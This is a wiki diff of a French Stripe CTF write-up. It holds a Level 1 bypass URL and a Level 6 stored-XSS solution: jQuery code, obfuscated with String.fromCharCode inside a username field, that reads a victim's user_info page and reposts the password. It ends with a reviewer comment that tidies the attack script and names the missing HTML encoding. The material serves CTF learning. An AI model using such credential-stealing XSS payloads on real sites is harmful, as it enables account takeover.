stripe_ctf [2012/08/29 10:23] mooh [Level 6] |
stripe_ctf [2017/04/09 15:33] (Version actuelle) |
Ligne 227: | Ligne 227: | ||
> https://level01-2.stripe-ctf.com/user-ntyjkglswi/?attempt=ref:%20refs/heads/master&filename=https://level01-2.stripe-ctf.com/user-ntyjkglswi/level01-code/HEAD | > https://level01-2.stripe-ctf.com/user-ntyjkglswi/?attempt=ref:%20refs/heads/master&filename=https://level01-2.stripe-ctf.com/user-ntyjkglswi/level01-code/HEAD | ||
+ | ** Autre solution : ** | ||
+ | |||
+ | > https://level01-2.stripe-ctf.com/user-vleajmvjkj/?attempt=&filename=a | ||
+ | |||
+ | Le fichier a n'existant pas il suffit de laisser le champ password vide. | ||
====== Level 2 ====== | ====== Level 2 ====== | ||
Ligne 1620: | Ligne 1625: | ||
</div> | </div> | ||
</code> | </code> | ||
+ | |||
+ | ** Solution ** | ||
+ | Une fois enregistre, la page principale contient une liste de posts et la liste des utilisateurs en ligne. L'utilisateur peut ajouter des nouveaux posts et cliquer sur son nom. Ceci ouvrira la page ''user_info'' qui contient le username et le password. | ||
+ | Comme pour l'epreuve du karma, l'idee est de forger un post de maniere a ce que quand celui-ci sera affiche par l'utilisateur level07-password-holder, les donnees de la page ''user_info'' seront lues et directement postees. | ||
+ | Voila un exemple de script que l'on pourrait utiliser | ||
+ | <code javascript> | ||
+ | $(function() | ||
+ | { | ||
+ | $(window).bind('load', function() | ||
+ | { | ||
+ | function httpGet(theUrl) | ||
+ | { | ||
+ | var xmlHttp = null; | ||
+ | |||
+ | xmlHttp = new XMLHttpRequest(); | ||
+ | xmlHttp.open( "GET", theUrl, false ); | ||
+ | xmlHttp.send( null ); | ||
+ | return xmlHttp.responseText; | ||
+ | } | ||
+ | |||
+ | value = httpGet("https://level06-2.stripe-ctf.com/user-fgdshrgpxf/user_info") | ||
+ | |||
+ | output = ""; | ||
+ | for(i=0; i<value.length; ++i) | ||
+ | { | ||
+ | if(output != "") output += ", "; | ||
+ | output += value.charCodeAt(i); | ||
+ | } | ||
+ | |||
+ | document.getElementById("new_post").title.value = "pw" | ||
+ | document.getElementById("new_post").content.value = output | ||
+ | |||
+ | |||
+ | document.getElementById("new_post").submit() | ||
+ | |||
+ | }); | ||
+ | }); | ||
+ | </code> | ||
+ | On remarque l'utilisation de ''$(window).bind('load', function()'' car il faut attendre que la page soit entierement chargee avant de pouvoir utiliser le formulaire. | ||
+ | On encode aussi le resultat de la requete GET car sinon il y a des problemes d'encodage quand on cree un post avec le contenu html. | ||
+ | Il ne reste plus qu'a trouver un endroit ou on peut injecter notre code. | ||
+ | Et c'est dans le username. Si on essaie de mettre le script entier dans le username, il y a une erreur au niveau du serveur, on va donc l'encoder egalement, ce qui donne | ||
+ | <code javascritp> | ||
+ | <script> | ||
+ | eval(String.fromCharCode(36,40,102,117,110,99,116,105,111,110,40,41,10,123,10,10,36,40,119,105,110,100,111,119,41,46,98,105,110,100,40,39,108,111,97,100,39,44,32,102,117,110,99,116,105,111,110,40,41,10,123,10,10,102,117,110,99,116,105,111,110,32,104,116,116,112,71,101,116,40,116,104,101,85,114,108,41,10,32,32,32,32,123,10,32,32,32,32,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,117,108,108,59,10,10,32,32,32,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,32,32,32,32,120,109,108,72,116,116,112,46,111,112,101,110,40,32,34,71,69,84,34,44,32,116,104,101,85,114,108,44,32,102,97,108,115,101,32,41,59,10,32,32,32,32,120,109,108,72,116,116,112,46,115,101,110,100,40,32,110,117,108,108,32,41,59,10,32,32,32,32,114,101,116,117,114,110,32,120,109,108,72,116,116,112,46,114,101,115,112,111,110,115,101,84,101,120,116,59,10,32,32,32,32,125,10,10,118,97,108,117,101,32,61,32,104,116,116,112,71,101,116,40,34,104,116,116,112,115,58,47,47,108,101,118,101,108,48,54,45,50,46,115,116,114,105,112,101,45,99,116,102,46,99,111,109,47,117,115,101,114,45,102,103,100,115,104,114,103,112,120,102,47,117,115,101,114,95,105,110,102,111,34,41,10,10,111,117,116,112,117,116,32,61,32,34,34,59,10,9,102,111,114,40,105,61,48,59,32,105,60,118,97,108,117,101,46,108,101,110,103,116,104,59,32,43,43,105,41,10,9,123,10,9,9,105,102,40,111,117,116,112,117,116,32,33,61,32,34,34,41,32,111,117,116,112,117,116,32,43,61,32,34,44,32,34,59,10,9,9,111,117,116,112,117,116,32,43,61,32,118,97,108,117,101,46,99,104,97,114,67,111,100,101,65,116,40,105,41,59,10,9,125,10,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,116,105,116,108,101,46,118,97,108,117,101,32,61,32,34,112,119,34,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,99,111,110,116,101,110,116,46,118,97,108,117,101,3
2,61,32,111,117,116,112,117,116,10,10,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,110,101,119,95,112,111,115,116,34,41,46,115,117,98,109,105,116,40,41,10,10,125,41,59,10,125,41,59)) | ||
+ | </script> | ||
+ | </code> | ||
+ | |||
+ | On cree ensuite un post quelconque et on attend que l'utilisateur 07 se connecte et on recupere son post | ||
+ | <code> | ||
+ | 60, 33, 100, 111, 99, 116, 121, 112, 101, 32, 104, 116, 109, 108, 62, 10, 60, 104, 116, 109, 108, 62, 10, 32, 32, 60, 104, 101, 97, 100, 62, 10, 32, 32, 32, 32, 60, 116, 105, 116, 108, 101, 62, 83, 116, 114, 101, 97, 109, 101, 114, 60, 47, 116, 105, 116, 108, 101, 62, 10, 32, 32, 32, 32, 60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 106, 115, 47, 106, 113, 117, 101, 114, 121, 45, 49, 46, 56, 46, 48, 46, 109, 105, 110, 46, 106, 115, 39, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62, 10, 32, 32, 32, 32, 60, 108, 105, 110, 107, 32, 114, 101, 108, 61, 39, 115, 116, 121, 108, 101, 115, 104, 101, 101, 116, 39, 32, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 99, 115, 115, 39, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 99, 115, 115, 47, 98, 111, 111, 116, 115, 116, 114, 97, 112, 45, 99, 111, 109, 98, 105, 110, 101, 100, 46, 109, 105, 110, 46, 99, 115, 115, 39, 32, 47, 62, 10, 32, 32, 60, 47, 104, 101, 97, 100, 62, 10, 32, 32, 60, 98, 111, 100, 121, 62, 10, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 98, 97, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 110, 97, 118, 98, 97, 114, 45, 105, 110, 110, 101, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 99, 111, 110, 116, 97, 105, 110, 101, 114, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 97, 32, 99, 108, 97, 115, 115, 61, 39, 98, 114, 97, 110, 100, 39, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 39, 62, 83, 116, 114, 101, 97, 109, 101, 114, 60, 47, 97, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 117, 108, 32, 99, 108, 97, 115, 115, 
61, 39, 110, 97, 118, 32, 112, 117, 108, 108, 45, 114, 105, 103, 104, 116, 39, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 108, 105, 62, 60, 97, 32, 104, 114, 101, 102, 61, 39, 47, 117, 115, 101, 114, 45, 102, 103, 100, 115, 104, 114, 103, 112, 120, 102, 47, 108, 111, 103, 111, 117, 116, 39, 62, 76, 111, 103, 32, 79, 117, 116, 60, 47, 97, 62, 60, 47, 108, 105, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 60, 47, 117, 108, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 99, 111, 110, 116, 97, 105, 110, 101, 114, 39, 62, 10, 10, 32, 32, 32, 32, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 114, 111, 119, 39, 62, 10, 32, 32, 60, 100, 105, 118, 32, 99, 108, 97, 115, 115, 61, 39, 115, 112, 97, 110, 49, 50, 39, 62, 10, 32, 32, 32, 32, 60, 104, 51, 62, 85, 115, 101, 114, 32, 73, 110, 102, 111, 114, 109, 97, 116, 105, 111, 110, 60, 47, 104, 51, 62, 10, 32, 32, 32, 32, 60, 116, 97, 98, 108, 101, 32, 99, 108, 97, 115, 115, 61, 39, 116, 97, 98, 108, 101, 32, 116, 97, 98, 108, 101, 45, 99, 111, 110, 100, 101, 110, 115, 101, 100, 39, 62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 104, 62, 85, 115, 101, 114, 110, 97, 109, 101, 58, 60, 47, 116, 104, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 100, 62, 108, 101, 118, 101, 108, 48, 55, 45, 112, 97, 115, 115, 119, 111, 114, 100, 45, 104, 111, 108, 100, 101, 114, 60, 47, 116, 100, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 60, 116, 114, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 104, 62, 80, 97, 115, 115, 119, 111, 114, 100, 58, 60, 47, 116, 104, 62, 10, 32, 32, 32, 32, 32, 32, 32, 32, 60, 116, 100, 62, 39, 68, 83, 109, 98, 88, 77, 102, 87, 112, 107, 
106, 88, 34, 60, 47, 116, 100, 62, 10, 32, 32, 32, 32, 32, 32, 60, 47, 116, 114, 62, 10, 32, 32, 32, 32, 60, 47, 116, 97, 98, 108, 101, 62, 10, 32, 32, 60, 47, 100, 105, 118, 62, 10, 60, 47, 100, 105, 118, 62, 10, 10, 32, 32, 32, 32, 60, 47, 100, 105, 118, 62, 10, 32, 32, 60, 47, 98, 111, 100, 121, 62, 10, 60, 47, 104, 116, 109, 108, 62, 10 | ||
+ | </code> | ||
+ | Un coup de ''fromCharCode'' et on obtient son mot de passe | ||
====== Level 7 ====== | ====== Level 7 ====== | ||
====== Level 8 ====== | ====== Level 8 ====== |
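Review bot: The script in the `<code javascript>` block leaks `value`, `output` and `i` as implicit globals and drops the semicolons on the `document.getElementById("new_post")` assignments; declaring them (`var value = httpGet(...);`, `var output = "";`, `for (var i = 0; i < value.length; ++i)`) keeps the example self-contained and avoids clobbering variables of the host page it runs inside. The second code tag is spelled `<code javascritp>`, so the wiki will not apply highlighting; it should read `<code javascript>`. The writeup names the injection point (the username) but not the root cause, which from the description appears to be that the username is rendered into the page without HTML encoding; a closing sentence such as `Le serveur affiche le username sans l'encoder en HTML ; encoder systematiquement les sorties suffit a bloquer cette attaque.` would make the lesson explicit for readers.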